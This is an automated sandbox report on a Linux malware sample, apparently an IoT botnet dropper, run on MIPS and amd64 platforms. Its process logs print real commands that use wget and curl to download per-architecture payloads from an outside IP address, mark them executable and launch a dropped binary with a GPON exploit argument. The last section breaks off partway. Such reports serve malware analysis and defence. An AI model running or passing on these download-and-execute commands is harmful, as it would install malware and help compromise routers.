Malware Analysis Report

2025-01-23 14:02

Sample ID 240823-fkkfwswelb
Target ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118
SHA256 eddc309883367d0560b940cf5019eb881112f560a336e048a17706a3f42015fc
Tags: antivm
Score: 7/10

Table of Contents

Analysis Overview
    MITRE ATT&CK
        Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral3
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral4
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score: 7/10

SHA256: eddc309883367d0560b940cf5019eb881112f560a336e048a17706a3f42015fc

Threat Level: Shows suspicious behavior

The file ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 was found to show suspicious behavior.

Malicious Activity Summary

antivm

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-08-23 04:55

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted: 2024-08-23 04:55
Reported: 2024-08-23 04:58
Platform: debian9-mipsbe-20240418-en
Max time kernel: 79s
Max time network: 80s

Command Line

[/tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118]

Signatures

Executes dropped EXE

Description | Indicator | Process | Target
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A

Reads runtime system information

Description | Indicator | Process | Target
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A

Writes file to tmp directory

Description | Indicator | Process | Target
File opened for modification | /tmp/g0away | /tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 | N/A

Processes

/tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118

[/tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]

/bin/cat

[cat m3th.x86]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away systemd-private-07299380d95e44f38e896cf6730821c0-systemd-timedated.service-B1BgAC]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]

/bin/cat

[cat m3th.mips]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away systemd-private-07299380d95e44f38e896cf6730821c0-systemd-timedated.service-B1BgAC]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]

/bin/cat

[cat m3th.mpsl]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away systemd-private-07299380d95e44f38e896cf6730821c0-systemd-timedated.service-B1BgAC]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]

/bin/cat

[cat m3th.arm]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away systemd-private-07299380d95e44f38e896cf6730821c0-systemd-timedated.service-B1BgAC]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]

/bin/cat

[cat m3th.arm5]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]

/bin/cat

[cat m3th.arm6]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]

/bin/cat

[cat m3th.arm7]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]

/bin/cat

[cat m3th.ppc]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]

/bin/cat

[cat m3th.m68k]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]

/bin/cat

[cat m3th.spc]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]

/bin/cat

[cat m3th.i686]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]

/bin/cat

[cat m3th.sh4]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]

/bin/cat

[cat m3th.arc]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

Network

Country | Destination | Domain | Proto
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted: 2024-08-23 04:55
Reported: 2024-08-23 04:58
Platform: debian9-mipsel-20240226-en
Max time kernel: 82s
Max time network: 86s

Command Line

[/tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118]

Signatures

Executes dropped EXE

Description | Indicator | Process | Target
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A

Reads runtime system information

Description | Indicator | Process | Target
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A
File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A

Writes file to tmp directory

Description | Indicator | Process | Target
File opened for modification | /tmp/g0away | /tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 | N/A

Processes

/tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118

[/tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]

/bin/cat

[cat m3th.x86]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away systemd-private-6959615890b94d28b77e9e6230635170-systemd-timedated.service-hk702E]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]

/bin/cat

[cat m3th.mips]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away systemd-private-6959615890b94d28b77e9e6230635170-systemd-timedated.service-hk702E]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]

/bin/cat

[cat m3th.mpsl]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away systemd-private-6959615890b94d28b77e9e6230635170-systemd-timedated.service-hk702E]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]

/bin/cat

[cat m3th.arm]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away systemd-private-6959615890b94d28b77e9e6230635170-systemd-timedated.service-hk702E]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]

/bin/cat

[cat m3th.arm5]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]

/bin/cat

[cat m3th.arm6]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]

/bin/cat

[cat m3th.arm7]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]

/bin/cat

[cat m3th.ppc]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]

/bin/cat

[cat m3th.m68k]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]

/bin/cat

[cat m3th.spc]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]

/bin/cat

[cat m3th.i686]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]

/bin/cat

[cat m3th.sh4]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]

/bin/cat

[cat m3th.arc]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

Network

Country | Destination | Domain | Proto
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp
HR | 45.95.168.230:80 |  | tcp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-08-23 04:55
Reported: 2024-08-23 04:58
Platform: ubuntu1804-amd64-20240508-en
Max time kernel: 79s
Max time network: 129s

Command Line

[/tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118]

Signatures

Executes dropped EXE

Description | Indicator | Process | Target
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A
N/A | /tmp/g0away | /tmp/g0away | N/A

Writes file to tmp directory

Description | Indicator | Process | Target
File opened for modification | /tmp/g0away | /tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 | N/A

Processes

/tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118

[/tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]

/bin/cat

[cat m3th.x86]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 config-err-gSYeSF g0away netplan_escgt653 snap-private-tmp ssh-DGjiLaK51db6 systemd-private-7d704eabf2e542bc8051481b6b431471-bolt.service-e6jDAF systemd-private-7d704eabf2e542bc8051481b6b431471-colord.service-KeVe2N systemd-private-7d704eabf2e542bc8051481b6b431471-ModemManager.service-AQvz0Z systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-resolved.service-Km8n5c systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-timedated.service-Y6dZLm]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]

/bin/cat

[cat m3th.mips]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 config-err-gSYeSF g0away netplan_escgt653 snap-private-tmp ssh-DGjiLaK51db6 systemd-private-7d704eabf2e542bc8051481b6b431471-bolt.service-e6jDAF systemd-private-7d704eabf2e542bc8051481b6b431471-colord.service-KeVe2N systemd-private-7d704eabf2e542bc8051481b6b431471-ModemManager.service-AQvz0Z systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-resolved.service-Km8n5c systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-timedated.service-Y6dZLm]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]

/bin/cat

[cat m3th.mpsl]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 config-err-gSYeSF g0away netplan_escgt653 snap-private-tmp ssh-DGjiLaK51db6 systemd-private-7d704eabf2e542bc8051481b6b431471-bolt.service-e6jDAF systemd-private-7d704eabf2e542bc8051481b6b431471-colord.service-KeVe2N systemd-private-7d704eabf2e542bc8051481b6b431471-ModemManager.service-AQvz0Z systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-resolved.service-Km8n5c systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-timedated.service-Y6dZLm]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]

/bin/cat

[cat m3th.arm]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 config-err-gSYeSF g0away netplan_escgt653 snap-private-tmp ssh-DGjiLaK51db6 systemd-private-7d704eabf2e542bc8051481b6b431471-bolt.service-e6jDAF systemd-private-7d704eabf2e542bc8051481b6b431471-colord.service-KeVe2N systemd-private-7d704eabf2e542bc8051481b6b431471-ModemManager.service-AQvz0Z systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-resolved.service-Km8n5c systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-timedated.service-Y6dZLm]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]

/bin/cat

[cat m3th.arm5]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 config-err-gSYeSF g0away netplan_escgt653 snap-private-tmp ssh-DGjiLaK51db6 systemd-private-7d704eabf2e542bc8051481b6b431471-bolt.service-e6jDAF systemd-private-7d704eabf2e542bc8051481b6b431471-colord.service-KeVe2N systemd-private-7d704eabf2e542bc8051481b6b431471-ModemManager.service-AQvz0Z systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-resolved.service-Km8n5c]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]

/bin/cat

[cat m3th.arm6]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 config-err-gSYeSF g0away netplan_escgt653 snap-private-tmp ssh-DGjiLaK51db6 systemd-private-7d704eabf2e542bc8051481b6b431471-bolt.service-e6jDAF systemd-private-7d704eabf2e542bc8051481b6b431471-colord.service-KeVe2N systemd-private-7d704eabf2e542bc8051481b6b431471-ModemManager.service-AQvz0Z systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-resolved.service-Km8n5c]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]

/bin/cat

[cat m3th.arm7]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 config-err-gSYeSF g0away netplan_escgt653 snap-private-tmp ssh-DGjiLaK51db6 systemd-private-7d704eabf2e542bc8051481b6b431471-bolt.service-e6jDAF systemd-private-7d704eabf2e542bc8051481b6b431471-colord.service-KeVe2N systemd-private-7d704eabf2e542bc8051481b6b431471-ModemManager.service-AQvz0Z systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-resolved.service-Km8n5c]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]

/bin/cat

[cat m3th.ppc]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 config-err-gSYeSF g0away netplan_escgt653 snap-private-tmp ssh-DGjiLaK51db6 systemd-private-7d704eabf2e542bc8051481b6b431471-bolt.service-e6jDAF systemd-private-7d704eabf2e542bc8051481b6b431471-colord.service-KeVe2N systemd-private-7d704eabf2e542bc8051481b6b431471-ModemManager.service-AQvz0Z systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-resolved.service-Km8n5c]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]

/bin/cat

[cat m3th.m68k]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 config-err-gSYeSF g0away netplan_escgt653 snap-private-tmp ssh-DGjiLaK51db6 systemd-private-7d704eabf2e542bc8051481b6b431471-bolt.service-e6jDAF systemd-private-7d704eabf2e542bc8051481b6b431471-colord.service-KeVe2N systemd-private-7d704eabf2e542bc8051481b6b431471-ModemManager.service-AQvz0Z systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-resolved.service-Km8n5c]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]

/bin/cat

[cat m3th.spc]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 config-err-gSYeSF g0away netplan_escgt653 snap-private-tmp ssh-DGjiLaK51db6 systemd-private-7d704eabf2e542bc8051481b6b431471-bolt.service-e6jDAF systemd-private-7d704eabf2e542bc8051481b6b431471-colord.service-KeVe2N systemd-private-7d704eabf2e542bc8051481b6b431471-ModemManager.service-AQvz0Z systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-resolved.service-Km8n5c]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]

/bin/cat

[cat m3th.i686]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 config-err-gSYeSF g0away netplan_escgt653 snap-private-tmp ssh-DGjiLaK51db6 systemd-private-7d704eabf2e542bc8051481b6b431471-bolt.service-e6jDAF systemd-private-7d704eabf2e542bc8051481b6b431471-colord.service-KeVe2N systemd-private-7d704eabf2e542bc8051481b6b431471-ModemManager.service-AQvz0Z systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-resolved.service-Km8n5c]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]

/bin/cat

[cat m3th.sh4]

